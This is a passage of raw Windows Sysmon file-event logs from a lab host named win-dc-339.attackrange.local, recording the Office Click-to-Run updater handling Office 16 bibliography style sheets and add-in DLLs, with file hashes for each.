Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Author2String.XSLMD5=38DCDDCC6D9071EDAAF7614FFED6821F,SHA256=C4EEF0F3AB223F299925DC63FA0BC24B522AF2809D18C12348257EB8A7ED42A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\TURABIAN.XSLMD5=F82561FF802442D12B8B77EC6EDC027E,SHA256=5B7A52DFAA9C3E9E340E081178B54E827ED591AC27DC098C3985C94BDE5CABE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\SIST02.XSLMD5=DAE31FA14BC97723A87F126B5121BAE3,SHA256=30F377F7AC24B022F52371ADA97CB057460265F4C8BDDBB521642B6E2462EE27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\MLASeventhEditionOfficeOnline.xslMD5=C9460BEAF863E337428518DAF5C09C5C,SHA256=A69368BE9AC843B088D739F1573007E634D1068DB0AD9937A95FE7A0690C05E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\ISO690Nmerical.XSLMD5=7777C0173259D8F4A4F5E69C1461CA14,SHA256=A343D61BAB2F25D138BDCC57D33C4A83FD494A54EAF3DF0F539E3B51CFE011F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\ISO690.XSLMD5=831E5489F3047AFF2EFDFF758FA42FEC,SHA256=7914A8B4ADFDC9A6589ED181DE46D3D735676A38AA61B8FAFC0F862B9EC3A1CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\IEEE2006OfficeOnline.xslMD5=96F3CCC20E23824F1904EDFDFE5CDA02,SHA256=9970654851826C920261D52F8536B1305F7E582C7A2E892BAC344A95F909FE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\HarvardAnglia2008OfficeOnline.xslMD5=08AD981C6D9BFD066BF29A77A62F0FEA,SHA256=BCFB2EF3D37F7DAFCB9FF4D92885C5F87B4BEC7A3045BC7208460DAE7DABAE31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\GostTitle.XSLMD5=234430F3D3032B9648671D3DF168D827,SHA256=DC7160C2FE5939E82BFEEE180C1DA8176C4914C034CAE8938ED6C9F7A9144F3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\GostName.XSLMD5=4C7ECD0ED5ADCC30352E2C06931D290A,SHA256=40BACD32DB58799FA95B4707588ADEA1C9065CD804712B69B55DDD332C037D4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\GB.XSLMD5=B17C7119B252FD46A675143F80499AA4,SHA256=8535282A6E53FA4F307375BCEE99DD073A4E2E04FAF8841E51E1AA0EE351A670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\CHICAGO.XSLMD5=0D0E65173F5AE6FE524DA09EEDDDCC84,SHA256=787D1CBF076902B2568E8CFF1245E5FBEBA6AAD84240A54C4F9957084B93F90D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xslMD5=58AAFDDC9C9FC6A422C6B29E8C4FCCA3,SHA256=9095FE60C9F5A135DFC22B23082574FBF2F223BD3551E75456F57787ABC5797B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Sort\YEAR.XSLMD5=25CC28EBF46889C76CD88698D50EFDA9,SHA256=8036FAC594757F903F1CAC877DC9EB816437E0F50BFA23B2299DD6E2D3A7836B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Sort\TITLE.XSLMD5=89EBDC0B24173C89FAE093F4DFCD4D89,SHA256=1E1022FA979CF1D8237871F7E595FB9751454C0B7246E7D169C9A1E7CFF8D5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Sort\TAG.XSLMD5=3AD2F7F3092B6DECA956587D96B857C7,SHA256=8FE6538942CB2014E1CD4EAB1C13435D0EB01715B18C8B73C0977592B70EF4FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Sort\AUTHOR.XSLMD5=77CA3DA9BA023F2CCAF3F8BBEDDA8224,SHA256=DFA1ACB8446865F00020FE0C25489015F78F3C214D42F96156F37BAF32411A3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AugLoop\third-party-notices.txtMD5=54FE70D43145201651724AE6F5DCC2E5,SHA256=A15A944E854213300CC1D62937CAEAE6D9AB61F03E8215B0C694003222A98932,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AugLoop\bundle.jsMD5=103CFE60B5739F9F5587C8AAF7D179F7,SHA256=1B5BC739DC9E4937668B5847004ABA3410D10BED6AE0F1FCC657BBFC6692E90F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\UmOutlookAddin.dllMD5=EEAC06BC506E3842ADCEBD43670AEA75,SHA256=61B040B72236D1C212E8DFC3FE1316F60D6DD0F94A2675076C3BA9905BDBF2C8,IMPHASH=C58131E451E4B0F651EDDEB3F0089DE5truetrue 23542300x800000000000000068755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PMAILEXT.ECFMD5=8627E3BE92113E62D5BC557EF22AF85D,SHA256=2D806441C6305CBE2CEB421AE10C8401EAE3032D89D1C5462161C7AEE9F7E0F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\OUTLVBA.DLLMD5=D00A97E4F53E9D59FD348F91B5CE490A,SHA256=CD5985BE141BF04D1B3C8FA31CB4132059A29A96891DDFD62504E2C8440D2AB0,IMPHASH=400BF69374F5217AC9583F5CEF2645E3truetrue 23542300x800000000000000068753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\OUTEX2.ECFMD5=37EA5FE6087EB87D433EAC32023EC407,SHA256=3CB0F188EF9DCA492589905E7D05EF377458B7AC38A3254272C418230D1A6907,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\OUTEX.ECFMD5=00AE03704250863D6084FF2A350DCFE3,SHA256=D80726178A23683950D325C84C8D8206D168C046B74C4ECF5E8B4FF8860C88E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\otkloadr_x64.dllMD5=4E1760AC016BFFA6C59169CCF78D3304,SHA256=D33B4BE881EC160C13F1D5D41A5CBA350BDD9CBFD40F12E0FE22E5FFB996794A,IMPHASH=AB6D110924D7259EC6BD5586FD129264truetrue 23542300x800000000000000068750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\MSSPC.ECFMD5=68088AA206A72834198DFBAF31AF4AD4,SHA256=32B3DC0DB0CB872E5AB6189997B9EF6F146F5C08C140120C84F77768A1F6B679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\MSOSEC.XMLMD5=2F78FA500EA5F9D68BA461C145BE0DDA,SHA256=A437E34CC4BA5DA43483CE5C80ECC1959D3614654D6BD953FD167889DA588789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\MSOSEC.DLLMD5=D6319AE98C6504B827341920352210EA,SHA256=54AF6DFF50F5288361414A8895F6A6C5F87073D308F19248338B4E454433DC58,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\FAXEXT.ECFMD5=1BAD018373103E521F17E425E52F85D1,SHA256=675E5CFA8BCF8C0A9F0FC74B3EBB6CD600C039CC276701EDED0AB54B4E443637,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\ColleagueImport.dllMD5=2551EE7AC562199897E0245AC32588A0,SHA256=DE2C312F9EE32FF4191CF8895CB62C8A38076AFE4B3D171993968511FB6A3731,IMPHASH=1922A75B0EA44826CFD92B89E5E1D42Dtruetrue 23542300x800000000000000068745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\ACCOLK.DLLMD5=02A49CB39E7839B9A7CB3679F7BE5544,SHA256=A75953E2694A5FC4C7ECAE198DB0A1675B3821B18950C08BE63B264FB87E10E3,IMPHASH=016342379DD09E788D7DB7F19FB150B2truetrue 23542300x800000000000000068744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\tracedefinition130.xmlMD5=E795987F418953A6212D9B16DF2C2B20,SHA256=AA231895BAD550F32CCCBB590C0E23BCB535238D7D90237581921CA8163F3B6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\sqmapi.dllMD5=57D22EE1AEA62B6EC08B58BC477EB5D8,SHA256=EA9730020035F8AD95322E8AF8CCB6F61EB2EBF94360DA03E37B09AF944FD5E4,IMPHASH=72DAC28481188E62C1C46EB31F00B666truetrue 23542300x800000000000000068742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\ReportingServicesNativeClient.dllMD5=58D5EE38120AD5AD1591856CF17A686C,SHA256=E0F6646BE69D0C15F85A4F4BFC6DA7409DFBD17BFF6B9AAF5CA3D462DCF92A60,IMPHASH=D1934E9E0A1DE77894786F588A3E30E8truetrue 23542300x800000000000000068741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\PowerPivotExcelClientAddIn.tlbMD5=1B36E1440724EBD0B57871FC8ED39707,SHA256=F06C457F603BB520C49ED028B92F67856965EBA2E64951AFF00C726B8A29BEBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\PowerPivotExcelClientAddIn.dllMD5=0627924FBC6A457B516192B2CCAE0317,SHA256=445F3FDAFE2AB1C003BF7990A77081C932D76E9AA4AFB047DF91F08AE1682B7E,IMPHASH=D7C8400BE09DBA18A1266F110B9EF87Ctruetrue 23542300x800000000000000068739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\OFFICE.dllMD5=745897FC2816625A0E5F1AC0F9AF16A2,SHA256=5512CABD57B6E1FBD2B96C298D804A3795CD317F61E154AEDB335F6C119EAF62,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\msvcr120.dllMD5=0C632C38503BDBDD3462912A0E6F7D48,SHA256=79BEFA981F6DE368D19731BB36A562629717ACE0FDB04316399546275FAC431F,IMPHASH=8F18E22935EF8B336E246EE763FBEC97truetrue 23542300x800000000000000068737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\msvcp120.dllMD5=8D27CD397E3B5EE7A82BBE37A21D27B9,SHA256=1579C98667B226CF32253C81B51FD907FBF79826939502E67824268BE82B57D3,IMPHASH=D0A59246EAB41D54812CD63C2326E1F1truetrue 23542300x800000000000000068736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.SqlServer.Types.dllMD5=302CF60605F3DA40957EFE94EF041D20,SHA256=586DC5EFAEB493C9B5C014DBC60B9AFFAD54B1B1FF4BC6C7605E3AF98C2FFF32,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.SqlServer.Configuration.SString.dllMD5=EDCC48F67F5084299905CA7E9D02688E,SHA256=9A77880A54B39CCF320E64B1CE0B952F765D9DF16287549C16C53FC23DAF3F15,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportViewer.WinForms.dllMD5=C528D56CBAF29595F69D4DDFFDAFA8D1,SHA256=570EDB67CC575F4389909EB27BBA9A91A4DD52F361F2D6935722B869B443E789,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportViewer.Common.dllMD5=EB26D4BB9C8C5FE9F71340C7E1768708,SHA256=00EF84D3986E9730CD11075B512C74E3E9ACB7AA52F3F3CC6D966D7D9EEE125C,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.ReportingServices.RsClient.dllMD5=2D8FE6A82B21C02E9BA6CBCF5FF01C36,SHA256=2C52929D0E96CA3A5762C35EFAEFE5929F30670165D7475EDF2CFBE2C6F8F76E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 